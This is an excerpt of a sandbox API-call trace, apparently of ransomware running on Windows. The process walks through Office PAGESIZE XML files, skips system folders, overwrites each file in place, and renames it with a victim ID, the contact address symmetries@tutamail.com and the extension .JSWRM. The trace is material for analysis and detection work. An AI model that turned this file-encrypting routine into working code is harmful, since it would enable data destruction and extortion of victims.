(HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0138.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL095.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL095.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL095.XML", lpUsedDefaultChar=0x0) returned 12 [0138.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0138.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0138.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL095.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL095.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL095.XML", lpUsedDefaultChar=0x0) returned 12 [0138.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0138.765] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0138.765] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0138.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0138.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL095.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl095.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.766] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=249026) returned 1 [0138.766] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.766] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0138.766] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0138.779] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.779] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0138.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0138.779] CloseHandle (hObject=0x238) returned 1 [0138.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0138.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0138.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0138.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0138.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0138.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0138.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0138.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0138.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0138.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0138.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0138.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0138.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0138.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0138.780] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL095.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl095.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL095.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl095.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0138.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0138.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0138.781] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d3659fb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d3659fb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d3659fb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a58e, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL096.XML", cAlternateFileName="")) returned 1 [0138.781] lstrcmpiW (lpString1="PGLBL096.XML", lpString2=".") returned 1 [0138.782] lstrcmpiW (lpString1="PGLBL096.XML", lpString2="..") returned 1 [0138.782] lstrcmpiW (lpString1="PGLBL096.XML", lpString2="...") returned 1 [0138.782] lstrcmpiW (lpString1="PGLBL096.XML", lpString2="windows") returned -1 [0138.782] lstrcmpiW (lpString1="PGLBL096.XML", lpString2="recovery") returned -1 [0138.782] lstrcmpiW (lpString1="PGLBL096.XML", lpString2="perflogs") returned 1 [0138.782] lstrcmpiW (lpString1="PGLBL096.XML", lpString2="documents and settings") returned 1 [0138.782] lstrcmpiW (lpString1="PGLBL096.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.782] lstrcmpiW (lpString1="PGLBL096.XML", lpString2="system volume information") returned -1 [0138.782] lstrcmpiW (lpString1="PGLBL096.XML", lpString2="msocache") returned 1 [0138.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0138.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL096.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL096.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL096.XML", lpUsedDefaultChar=0x0) returned 12 [0138.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0138.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0138.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL096.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL096.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL096.XML", lpUsedDefaultChar=0x0) returned 12 [0138.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0138.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0138.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0138.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0138.782] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL096.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl096.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.784] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=107918) returned 1 [0138.784] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a580) returned 0x2501e8 [0138.784] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1a580, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x1a580, lpOverlapped=0x0) returned 1 [0138.792] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.792] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1a580, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x1a580, lpOverlapped=0x0) returned 1 [0138.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0138.792] CloseHandle (hObject=0x238) returned 1 [0138.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0138.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0138.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0138.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0138.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0138.792] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0138.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0138.792] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0138.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0138.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0138.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0138.793] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0138.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0138.793] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0138.793] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL096.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl096.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL096.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl096.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0138.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0138.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0138.794] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d3659fb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d3659fb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d7b7e3f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x80ba, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL097.XML", cAlternateFileName="")) returned 1 [0138.794] lstrcmpiW (lpString1="PGLBL097.XML", lpString2=".") returned 1 [0138.794] lstrcmpiW (lpString1="PGLBL097.XML", lpString2="..") returned 1 [0138.794] lstrcmpiW (lpString1="PGLBL097.XML", lpString2="...") returned 1 [0138.794] lstrcmpiW (lpString1="PGLBL097.XML", lpString2="windows") returned -1 [0138.794] lstrcmpiW (lpString1="PGLBL097.XML", lpString2="recovery") returned -1 [0138.794] lstrcmpiW (lpString1="PGLBL097.XML", lpString2="perflogs") returned 1 [0138.794] lstrcmpiW (lpString1="PGLBL097.XML", lpString2="documents and settings") returned 1 [0138.794] lstrcmpiW (lpString1="PGLBL097.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.794] lstrcmpiW (lpString1="PGLBL097.XML", lpString2="system volume information") returned -1 [0138.794] lstrcmpiW (lpString1="PGLBL097.XML", lpString2="msocache") returned 1 [0138.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0138.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL097.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL097.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL097.XML", lpUsedDefaultChar=0x0) returned 12 [0138.794] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0138.794] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0138.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL097.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL097.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL097.XML", lpUsedDefaultChar=0x0) returned 12 [0138.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0138.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0138.795] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0138.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.795] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.795] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0138.795] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL097.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl097.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.796] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=32954) returned 1 [0138.796] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80b0) returned 0x27b348 [0138.796] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x80b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x80b0, lpOverlapped=0x0) returned 1 [0138.804] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.804] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x80b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x80b0, lpOverlapped=0x0) returned 1 [0138.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0138.804] CloseHandle (hObject=0x238) returned 1 [0138.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0138.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0138.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0138.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0138.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0138.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0138.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0138.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0138.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0138.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0138.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0138.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0138.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0138.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0138.805] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL097.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl097.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL097.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl097.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0138.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0138.806] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0138.806] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d3659fb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d3659fb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d3659fb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe730, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL102.XML", cAlternateFileName="")) returned 1 [0138.806] lstrcmpiW (lpString1="PGLBL102.XML", lpString2=".") returned 1 [0138.806] lstrcmpiW (lpString1="PGLBL102.XML", lpString2="..") returned 1 [0138.806] lstrcmpiW (lpString1="PGLBL102.XML", lpString2="...") returned 1 [0138.806] lstrcmpiW (lpString1="PGLBL102.XML", lpString2="windows") returned -1 [0138.806] lstrcmpiW (lpString1="PGLBL102.XML", lpString2="recovery") returned -1 [0138.806] lstrcmpiW (lpString1="PGLBL102.XML", lpString2="perflogs") returned 1 [0138.806] lstrcmpiW (lpString1="PGLBL102.XML", lpString2="documents and settings") returned 1 [0138.806] lstrcmpiW (lpString1="PGLBL102.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.806] lstrcmpiW (lpString1="PGLBL102.XML", lpString2="system volume information") returned -1 [0138.806] lstrcmpiW (lpString1="PGLBL102.XML", lpString2="msocache") returned 1 [0138.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0138.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL102.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL102.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL102.XML", lpUsedDefaultChar=0x0) returned 12 [0138.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0138.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0138.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL102.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL102.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL102.XML", lpUsedDefaultChar=0x0) returned 12 [0138.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0138.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0138.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0138.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", 